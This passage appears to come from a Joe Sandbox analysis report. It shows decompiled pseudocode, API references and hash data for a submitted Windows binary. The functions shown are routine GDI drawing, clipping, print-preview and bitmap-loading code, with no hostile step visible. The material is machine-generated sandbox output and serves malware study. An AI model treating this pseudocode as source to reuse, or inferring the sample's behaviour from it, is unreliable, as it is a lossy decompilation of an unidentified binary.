				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
				_t251 = _t150;
				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
				if(_t150 != 0) {
					E00419D35(_t246, _t251);
				}
				E0041A0FB(_t246, 0);
				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 5;
				E0041A668(_t255 - 0x34);
				 *(_t255 - 0x24) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 6;
				E0041A668(_t255 - 0x24);
				 *(_t255 - 0x14) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 7;
				E0041A668(_t255 - 0x14);
				 *(_t255 - 0x1c) = 0x42cb14;
				 *((char*)(_t255 - 4)) = 8;
				E0041A668(_t255 - 0x1c);
				 *(_t255 - 0x2c) = 0x42cb14;
				 *((intOrPtr*)(_t255 - 4)) = 9;
				_t159 = E0041A668(_t255 - 0x2c);
				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
				return _t159;
			}

0x00423c5f
0x00423c6a
0x00423c6f
0x00423c79
0x00423c81
0x00423c84
0x00423c89
0x00423c8f
0x00423c93
0x00423c98
0x00423c9e
0x00423cac
0x00423cb8
0x00423cce
0x00423cdf
0x00423cf3
0x00423d06
0x00423d13
0x00423d1c
0x00423d26
0x00423d2c
0x00423d2f
0x00423d36
0x00423d36
0x00423d3c
0x00423d41
0x00423d41
0x00423d47
0x00423d4c
0x00423d52
0x00423d56
0x00423d5b
0x00423d5e
0x00423d61
0x00423d67
0x00423d7b
0x00423d8e
0x00423d99
0x00423daf
0x00423dbe
0x00423dd3
0x00423de1
0x00423dea
0x00423df4
0x00423e06
0x00423e16
0x00423e23
0x00423e2c
0x00423e36
0x00423e36
0x00423e06
0x00423e48
0x00423e54
0x00423e61
0x00423e69
0x00423e8c
0x00423e95
0x00423e95
0x00423e9d
0x00423ea0
0x00423ea2
0x00423ea2
0x00423ea8
0x00423eb5
0x00423ebd
0x00423ec5
0x00423ee0
0x00423ee8
0x00423eed
0x00423eed
0x00423ef5
0x00423eff
0x00423f05
0x00423f09
0x00423f0e
0x00423f14
0x00423f18
0x00423f1d
0x00423f23
0x00423f27
0x00423f2c
0x00423f32
0x00423f36
0x00423f3b
0x00423f41
0x00423f48
0x00423f53
0x00423f5b

APIs

__EH_prolog.LIBCMT ref: 00423C5F
CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
CopyRect.USER32 ref: 00423CB8
InflateRect.USER32(?,?,?), ref: 00423CCE
IntersectRect.USER32 ref: 00423CDF
CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
CopyRect.USER32 ref: 00423D99
InflateRect.USER32(?,?,?), ref: 00423DAF
IntersectRect.USER32 ref: 00423DBE
SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36

Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F

Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00428C35, Relevance: 25.6, APIs: 17, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00428C35(intOrPtr* __ecx) {
				void* _t19;
				void* _t46;
				void* _t64;

				if( *(__ecx + 4) != 0) {
					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
					SelectObject( *(__ecx + 8), _t64);
					SelectObject( *(__ecx + 4), _t64);
					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
					SelectObject( *(__ecx + 8), _t46);
					SelectObject( *(__ecx + 4), _t46);
					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
					 *((intOrPtr*)( *__ecx + 0x30))();
					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
					return  *((intOrPtr*)( *__ecx + 0x2c))();
				}
				return _t19;
			}

0x00428c3c
0x00428c5b
0x00428c61
0x00428c67
0x00428c73
0x00428c79
0x00428c7f
0x00428c8d
0x00428c9e
0x00428caf
0x00428cc0
0x00428cd1
0x00428ced
0x00428cf0
0x00428d04
0x00000000
0x00428d0c
0x00428d0e

APIs

GetStockObject.GDI32(00000007), ref: 00428C4D
SelectObject.GDI32(00000000,00000000), ref: 00428C59
SelectObject.GDI32(00000000,00000000), ref: 00428C61
SelectObject.GDI32(00000000,00000000), ref: 00428C67
GetStockObject.GDI32(00000004), ref: 00428C6B
SelectObject.GDI32(00000000,00000000), ref: 00428C71
SelectObject.GDI32(00000000,00000000), ref: 00428C79
SelectObject.GDI32(00000000,00000000), ref: 00428C7F
GetROP2.GDI32(00000000), ref: 00428C84

Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D

GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95

Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1

GetTextAlign.GDI32(00000000), ref: 00428CA6

Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269

GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7

Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF

GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8

Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B

GetTextColor.GDI32(00000000), ref: 00428CD9
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
GetBkColor.GDI32(00000000), ref: 00428CF6
GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
String ID:
API String ID: 1751264856-0
Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98

Uniqueness

Uniqueness Score: -1.00%

Function 00427432, Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 332
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00427432(intOrPtr* __ecx) {
				void* __ebx;
				void* __edi;
				void* _t171;
				struct HDC__* _t188;
				intOrPtr* _t192;
				intOrPtr _t203;
				struct HBRUSH__* _t239;
				intOrPtr* _t244;
				signed int* _t276;
				intOrPtr* _t281;
				intOrPtr _t301;
				intOrPtr _t317;
				intOrPtr* _t339;
				intOrPtr _t342;
				intOrPtr _t343;
				int* _t351;
				intOrPtr* _t352;
				int _t353;
				void* _t355;

				_t171 = E00406520(E0042A17C, _t355);
				_t281 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
					return _t171;
				} else {
					_t339 =  *((intOrPtr*)(_t355 + 8));
					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
					 *((intOrPtr*)(_t355 - 0x38)) = 0;
					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
					 *(_t355 - 0x28) =  *(_t355 - 0x20);
					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
					 *(_t355 - 4) = 0;
					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
					 *(_t355 - 4) = 1;
					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
					 *((intOrPtr*)(_t355 - 0x10)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
						L21:
						E0041A668(_t355 - 0x3c);
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
						 *(_t355 - 4) = 2;
						E0041A668(_t355 - 0x34);
						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
						 *(_t355 - 4) = 3;
						_t171 = E0041A668(_t355 - 0x3c);
						goto L22;
					} else {
						 *((intOrPtr*)(_t355 - 0x14)) = 0;
						while(1) {
							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
							if(_t339 != 0) {
								_t188 =  *(_t339 + 4);
							} else {
								_t188 = 0;
							}
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
							_t192 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
							}
							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
							 *((intOrPtr*)( *_t339 + 0x1c))();
							_t203 =  *((intOrPtr*)(_t281 + 0x90));
							_t301 =  *((intOrPtr*)(_t355 - 0x14));
							_t351 = _t301 + _t203;
							 *(_t355 - 0x1c) = _t351;
							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
									_t276 = E0041AFCE(_t281, _t355 - 0x44);
									 *(_t355 - 0x2c) =  ~( *_t276);
									 *(_t355 - 0x28) =  ~(_t276[1]);
								}
							}
							 *((intOrPtr*)( *_t339 + 0x34))(1);
							 *((intOrPtr*)( *_t339 + 0x38))(_t355 - 0x4c,  *(_t355 - 0x2c),  *(_t355 - 0x28));
							E00419FFB(_t339, _t355 - 0x54, 0, 0);
							 *((intOrPtr*)( *_t339 + 0x24))(5);
							E00419D35(_t339, _t355 - 0x3c);
							Rectangle( *(_t339 + 4),  *_t351, _t351[1], _t351[2], _t351[3]);
							E00419D35(_t339, _t355 - 0x34);
							E0041A1BF(_t339, _t355 - 0x5c, _t351[2] + 1, _t351[1] + 3);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							E0041A1BF(_t339, _t355 - 0x64,  *_t351 + 3, _t351[3] + 1);
							E0041A20B(_t339, _t351[2] + 1, _t351[3] + 1);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							 *(_t355 - 0x74) =  *(_t355 - 0x74) + 1;
							 *((intOrPtr*)(_t355 - 0x70)) =  *((intOrPtr*)(_t355 - 0x70)) + 1;
							 *((intOrPtr*)(_t355 - 0x6c)) =  *((intOrPtr*)(_t355 - 0x6c)) - 2;
							 *((intOrPtr*)(_t355 - 0x68)) =  *((intOrPtr*)(_t355 - 0x68)) - 2;
							_t239 = GetStockObject(0);
							_t352 =  *((intOrPtr*)(_t355 + 8));
							FillRect( *(_t352 + 4), _t355 - 0x74, _t239);
							 *((intOrPtr*)( *_t352 + 0x20))(0xffffffff);
							_t244 =  *((intOrPtr*)(_t281 + 0x114));
							if( *((intOrPtr*)(_t244 + 0x10)) == 0) {
								break;
							}
							_t317 =  *((intOrPtr*)(_t281 + 0xf4));
							_t342 =  *((intOrPtr*)(_t355 - 0x10));
							if(_t317 + _t342 > ( *( *((intOrPtr*)( *_t244 + 0x5c)) + 0x1e) & 0x0000ffff)) {
								L18:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
								 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
								if(_t342 == 0) {
									_t249 =  *((intOrPtr*)(_t281 + 0xf4));
									if( *((intOrPtr*)(_t281 + 0xf4)) > 1) {
										E00427C71(_t281, _t249 - 1, 1);
									}
								}
								goto L21;
							}
							_t343 = _t342 + 1;
							 *((intOrPtr*)( *_t281 + 0x110))(_t317, _t343);
							_t353 =  *(_t355 - 0x1c);
							E00428B78(_t281,  *((intOrPtr*)(_t281 + 0x74)), _t343,  *((intOrPtr*)(_t353 + 0x18)),  *((intOrPtr*)(_t353 + 0x1c)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x70))(0xd, 0, 0, _t355 - 0x24);
							E004298F1( *((intOrPtr*)(_t281 + 0x74)), _t355 - 0x24);
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *_t353;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *((intOrPtr*)(_t353 + 4));
							 *(_t355 - 0x24) =  *(_t355 - 0x24) + 1;
							 *(_t355 - 0x24) =  *(_t355 - 0x24) +  *(_t355 - 0x2c);
							 *(_t355 - 0x20) =  *(_t355 - 0x20) + 1;
							 *(_t355 - 0x20) =  *(_t355 - 0x20) +  *(_t355 - 0x28);
							E00429859( *((intOrPtr*)(_t281 + 0x74)),  *(_t355 - 0x24),  *(_t355 - 0x20));
							E0042986F( *((intOrPtr*)(_t281 + 0x74)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xfc))( *((intOrPtr*)(_t281 + 0x74)),  *((intOrPtr*)(_t281 + 0x114)));
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x18))();
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x20))( *((intOrPtr*)(_t355 - 0x18)));
							 *((intOrPtr*)(_t355 - 0x14)) =  *((intOrPtr*)(_t355 - 0x14)) + 0x28;
							 *((intOrPtr*)(_t355 - 0x10)) = _t343;
							if(_t343 <  *((intOrPtr*)(_t281 + 0xf8))) {
								_t339 =  *((intOrPtr*)(_t355 + 8));
								continue;
							}
							goto L21;
						}
						_t342 =  *((intOrPtr*)(_t355 - 0x10));
						goto L18;
					}
				}
			}

0x00427437
0x00427441
0x00427448
0x00427805
0x0042780a
0x00427812
0x00427457
0x00427458
0x00427462
0x0042746b
0x0042746e
0x00427474
0x00427477
0x0042747e
0x0042749a
0x0042749f
0x004274a3
0x004274ac
0x004274c2
0x004274cd
0x004274d0
0x004274dd
0x004277ce
0x004277d1
0x004277d9
0x004277e3
0x004277e9
0x004277ed
0x004277f2
0x004277f8
0x004277ff
0x00000000
0x004274e3
0x004274e3
0x004274eb
0x004274f6
0x004274f9
0x004274ff
0x004274fb
0x004274fb
0x004274fb
0x00427508
0x0042751a
0x0042751d
0x00427537
0x00427542
0x00427542
0x00427558
0x00427577
0x0042758f
0x00427599
0x0042759c
0x004275a2
0x004275aa
0x004275ad
0x004275b0
0x004275b9
0x004275c6
0x004275ce
0x004275dc
0x004275df
0x004275df
0x004275c6
0x004275e8
0x004275f9
0x00427606
0x00427611
0x0042761a
0x0042762d
0x00427639
0x00427650
0x00427661
0x00427677
0x00427688
0x00427692
0x00427693
0x00427694
0x00427695
0x00427696
0x00427699
0x0042769c
0x004276a0
0x004276a4
0x004276aa
0x004276b5
0x004276c1
0x004276c4
0x004276ce
0x00000000
0x00000000
0x004276d6
0x004276dc
0x004276eb
0x004277a0
0x004277a5
0x004277b1
0x004277b6
0x004277b8
0x004277c1
0x004277c9
0x004277c9
0x004277c1
0x00000000
0x004277b6
0x004276f3
0x004276f8
0x004276fe
0x0042770a
0x0042771e
0x00427728
0x00427732
0x00427735
0x0042773b
0x0042773e
0x00427744
0x00427747
0x00427753
0x0042775b
0x0042776e
0x00427779
0x00427785
0x00427788
0x00427792
0x00427795
0x004274e8
0x00000000
0x004274e8
0x00000000
0x0042779b
0x0042779d
0x00000000
0x0042779d
0x004274dd

APIs

__EH_prolog.LIBCMT ref: 00427437
GetViewportOrgEx.GDI32(?,?), ref: 00427462
GetSysColor.USER32(00000006), ref: 00427489
CreatePen.GDI32(00000000,00000002,00000000), ref: 00427490
GetSysColor.USER32(00000010), ref: 004274B0
CreatePen.GDI32(00000000,00000003,00000000), ref: 004274B8
GetDeviceCaps.GDI32(?,0000000A), ref: 00427556
GetDeviceCaps.GDI32(?,00000008), ref: 00427563
SetRect.USER32 ref: 00427577
DPtoLP.GDI32(?,?,00000002), ref: 0042758F
Rectangle.GDI32(00000001,72E7AD70,?,?,?), ref: 0042762D

Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D

Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1E1
Part of subcall function 0041A1BF: MoveToEx.GDI32(?,?,?,?), ref: 0041A1F5

Part of subcall function 0041A20B: MoveToEx.GDI32(?,?,?,00000000), ref: 0041A225
Part of subcall function 0041A20B: LineTo.GDI32(?,?,?), ref: 0041A236

GetStockObject.GDI32(00000000), ref: 004276A4
FillRect.USER32 ref: 004276B5

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,0000000A), ref: 00429884
Part of subcall function 0042986F: GetDeviceCaps.GDI32(?,00000008), ref: 0042988D
Part of subcall function 0042986F: SetMapMode.GDI32(?,00000001), ref: 004298A5
Part of subcall function 0042986F: SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 004298B3
Part of subcall function 0042986F: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 004298C3
Part of subcall function 0042986F: IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 004298DE

Strings

(, xrefs: 00427788

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: CapsDevice$MoveObjectRectViewport$ColorCreateSelectWindow$ClipFillH_prologIntersectLineModeRectangleStock
String ID: (
API String ID: 14264375-3887548279
Opcode ID: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction ID: c53487ea9dce1701cc3862e452b5fc9e596f4e2bded4e1f589efc21baabd4d08
Opcode Fuzzy Hash: 5356feb156921028ef3ddc0151e9ddf4cdc27a2cc2d9984696750f9678fc26b0
Instruction Fuzzy Hash: EED14970A00219DFCB15DFA4D985EAEBBB5FF48304F14406AF816AB266CB35AD41CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0041C129, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132
windowCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041C129(int _a4, int _a8, struct HDC__* _a12) {
				int* _v8;
				intOrPtr* _v12;
				void* _v16;
				void* _t37;
				signed int _t42;
				struct HDC__* _t49;
				struct HBITMAP__* _t50;
				intOrPtr* _t60;
				int* _t61;
				int _t66;
				signed int _t69;
				intOrPtr* _t74;
				signed int _t77;
				signed int* _t82;
				int _t83;
				struct HDC__* _t84;
				intOrPtr* _t85;

				_t37 = LoadResource(_a4, _a8);
				if(_t37 == 0) {
					L3:
					return 0;
				}
				_t60 = LockResource(_t37);
				_v12 = _t60;
				if(_t60 == 0) {
					goto L3;
				}
				_t80 =  *_t60 + 0x40;
				_t85 = E00405667( *_t60 + 0x40);
				if(_t85 != 0) {
					E00405700(_t85, _t60, _t80);
					_t82 = _t85 +  *_t85;
					_a8 = 0x10;
					do {
						_t42 =  *_t82;
						_t69 = 0;
						_t74 = 0x42dbc0;
						while(_t42 !=  *_t74) {
							_t74 = _t74 + 8;
							_t69 = _t69 + 1;
							if(_t74 < "DllGetVersion") {
								continue;
							}
							goto L13;
						}
						if(_a12 == 0) {
							_t61 = 0x42dbc4 + _t69 * 8;
							_v8 = _t61;
							GetSysColor( *(0x42dbc4 + _t69 * 8));
							GetSysColor( *_t61);
							 *_t82 = 0 << 0x00000008 | GetSysColor( *_v8) >> 0x00000010 & 0x000000ff;
						} else {
							if( *(0x42dbc4 + _t69 * 8) != 0x12) {
								 *_t82 = 0xffffff;
							}
						}
						L13:
						_t82 =  &(_t82[1]);
						_t14 =  &_a8;
						 *_t14 = _a8 - 1;
					} while ( *_t14 != 0);
					_t83 =  *(_t85 + 4);
					_t66 =  *(_t85 + 8);
					_a4 = _t83;
					_a8 = _t66;
					_t49 = GetDC(0);
					_a12 = _t49;
					_t50 = CreateCompatibleBitmap(_t49, _t83, _t66);
					_v8 = _t50;
					if(_t50 != 0) {
						_t84 = CreateCompatibleDC(_a12);
						_v16 = SelectObject(_t84, _v8);
						_push(0xcc0020);
						_push(0);
						_push(_t85);
						_t77 = 1;
						StretchDIBits(_t84, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (_t77 <<  *(_t85 + 0xe)) * 4, ??, ??, ??);
						SelectObject(_t84, _v16);
						DeleteDC(_t84);
					}
					ReleaseDC(0, _a12);
					E004062E0(_t85);
					return _v8;
				}
				goto L3;
			}

0x0041c138
0x0041c140
0x0041c164
0x00000000
0x0041c164
0x0041c149
0x0041c14d
0x0041c150
0x00000000
0x00000000
0x0041c154
0x0041c15d
0x0041c162
0x0041c16e
0x0041c178
0x0041c17a
0x0041c181
0x0041c181
0x0041c183
0x0041c185
0x0041c18a
0x0041c18e
0x0041c191
0x0041c198
0x00000000
0x00000000
0x00000000
0x0041c19a
0x0041c1a0
0x0041c1bb
0x0041c1c2
0x0041c1c5
0x0041c1d3
0x0041c1f1
0x0041c1a2
0x0041c1aa
0x0041c1ac
0x0041c1ac
0x0041c1aa
0x0041c1f3
0x0041c1f3
0x0041c1f6
0x0041c1f6
0x0041c1f6
0x0041c1fb
0x0041c1fe
0x0041c203
0x0041c206
0x0041c209
0x0041c212
0x0041c215
0x0041c21d
0x0041c220
0x0041c234
0x0041c23c
0x0041c241
0x0041c246
0x0041c247
0x0041c24a
0x0041c266
0x0041c270
0x0041c273
0x0041c273
0x0041c27e
0x0041c285
0x00000000
0x0041c28d
0x00000000

APIs

LoadResource.KERNEL32(00000800,?,00000800,?,00000000,?,00000800), ref: 0041C138
LockResource.KERNEL32(00000000), ref: 0041C143
GetSysColor.USER32 ref: 0041C1C5
GetSysColor.USER32(00000000), ref: 0041C1D3
GetSysColor.USER32(00000000), ref: 0041C1E3
GetDC.USER32(00000000), ref: 0041C209
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0041C215
CreateCompatibleDC.GDI32(00000000), ref: 0041C225
SelectObject.GDI32(00000000,00000000), ref: 0041C237
StretchDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00CC0020), ref: 0041C266
SelectObject.GDI32(00000000,00000000), ref: 0041C270
DeleteDC.GDI32(00000000), ref: 0041C273
ReleaseDC.USER32 ref: 0041C27E

Strings

DllGetVersion, xrefs: 0041C192

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch
String ID: DllGetVersion
API String ID: 257281507-2861820592
Opcode ID: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction ID: 6de00a9f57abe9814b0481798e49b421408311c8e62ebcc167af93806f14bb4d
Opcode Fuzzy Hash: ba54e3975dec8b053c8b5ba4c6c2e954c4eed9ef953e3e4e01080731b16a167f
Instruction Fuzzy Hash: 8441D671640204FFDB219FA4DC88AAF3BB5FF48350B54802AF90597261D7349A56DFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD2, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404DD2() {
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
